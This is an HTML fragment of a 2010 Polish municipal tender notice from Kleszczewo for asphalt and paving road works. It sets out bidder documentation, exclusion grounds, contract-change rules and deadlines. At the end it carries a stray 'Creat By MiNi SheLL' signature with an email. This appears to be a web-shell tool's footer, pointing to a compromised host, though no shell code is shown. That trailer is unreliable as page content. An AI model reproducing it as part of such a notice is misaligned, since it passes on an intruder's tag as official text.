<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmiany zakresu robót , który wprowadzony zostanie aneksem do umowy lub odrębną umową i w takim przypadku , strony uzgadniają że,
w przypadku ewentualnych zamówień uzupełniających,   dodatkowych   dokonywanych przez  zamawiającego w ciągu     sześciu m-cy.  po odbiorze przedmiotu zamówienia. Oferent zrealizuje je w cenach jednostkowych  tożsamych  z przedstawioną ofertą  ( dla robót uzupełniających , stanowiących nie więcej niż 50% zamówienia podstawowego) i dodatkowych po cenach  obliczonych na podstawie obowiązujących cen jednostkowych i katalogów KRN przyjętych do wyliczenia  przedstawionej oferty.
 1.Umowa może być zmieniona w poniższym zakresie
termin wykonania zamówienia może ulec zmianie w przypadku niesprzyjających warunków atmosferycznych oraz wystąpienia nieprzewidzianych okoliczności wynikłych w trakcie realizacji zadania. Termin ten zostanie przedłużony o taki okres na jaki zostały wstrzymane roboty stanowiące przedmiot zamówienia  na skutek wystąpienia w.w. okoliczności. 

Roboty uzupełniające i dodatkowe udzielone zgodnie z art. 67  ust. 1 pkt 5,6 ustawy Prawo zamówień     publicznych;
2.1. W przypadku udzielenia, w okresie sześciu miesięcy  od udzielenia zamówienia podstawowego,   dotychczasowemu Wykonawcy  robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia   podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Zamówienie uzupełniające jest       przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia  podstawowego;
 W   przypadku   udzielania    wykonawcy   robót budowlanych zamówień dodatkowych, nieobjętych zamówieniem podstawowym i  nieprzekraczających   łącznie 50 %   wartości    realizowanego    zamówienia,  niezbędnych  do  jego
prawidłowego  wykonania,  których  wykonanie  stało   się   konieczne  na  skutek  sytuacji  niemożliwej  wcześniej  do przewidzenia, jeżeli:
a)	z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów lub
        b)	wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego
2.3. Roboty dodatkowe  nie ujęte  w przedmiarze robót oraz roboty   będą rozliczane wg następujących zasad  
a)   Wykonawca zobowiązany jest do prowadzenia na bieżąco księgi obmiarów dla  dodatkowo wykonanych    robót oraz uzupełniających ulegających   zakryciu  oraz zróżnicowaniu robót nie wykonanych. Zgodność  wpisów do księgi z faktycznymi obmiarami z natury potwierdza inspektor nadzoru.
b)przystąpieniem do wykonywania  robót dodatkowych  i uzupełniających należy każdorazowo uzgodnić z  inspektorem nadzoru  oraz inwestorem. Ich zgodą inspektora i inwestora  do wykonania będzie  potwierdzenie wpisu w księgę   obmiaru.  
c)   materiały nie ujęte w ślepych kosztorysach  lub zamienione na zlecenie Zamawiającego liczone będą według cen aktualnych w   dniu złożenia oferty .
d) robocizna pozycji nie ujętych w ślepych kosztorysach liczona będzie wg. norm i stawek kalkulacyjnych  przyjętych do sporządzenia  kosztorysu ofertowego .
3. Zakres robót tożsamy z   zamówieniem podstawowym  określony  w  SIWZ;    nawierzchni asfaltowej do    12500 m2, nawierzchni z kostki brukowej gr 6 cm 93 mb , nawierzchni z kostki brukowej gr 8 cm 230,00     m2 na podbudowie 20-22 cm
4) W przypadku  zamówień uzupełniających i dodatkowych Wykonawca zobowiązuje
         się je wykonać na warunkach określonych niniejszą specyfikacją  .
5) Za roboty objęte kosztorysem ofertowym, ale niewykonane z powodu wcześniejszego uznania ich przez Zamawiającego wpisem do księgi obmiaru za zbędne, wynagrodzenie nie przysługuje. Zbędność wykonania robót nie wymaga w tym wypadku aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kleszczewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kleszczewie 
Ul. Poznańska 4
63-005 Kleszczewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 09:00, miejsce: Urząd Gminy w Kleszczewie 
Ul. Poznańska 4
63-005 Kleszczewo
faks: 061 8176184
sekretariat pok. nr 16 ( I p).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego  w ramach:
Priorytetu II - infrastruktura komunalna 
Działania 2.2 - Poprawa dostępności do regionalnego i ponad regionalnego układu drogowego
 ( drogi wojewódzkie w miastach na prawach powiatu, powiatowe i gminne)
Schemat II - Drogi w granicach administracyjnych miast poniżej 50 tys. mieszkańców oraz na obszarach wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com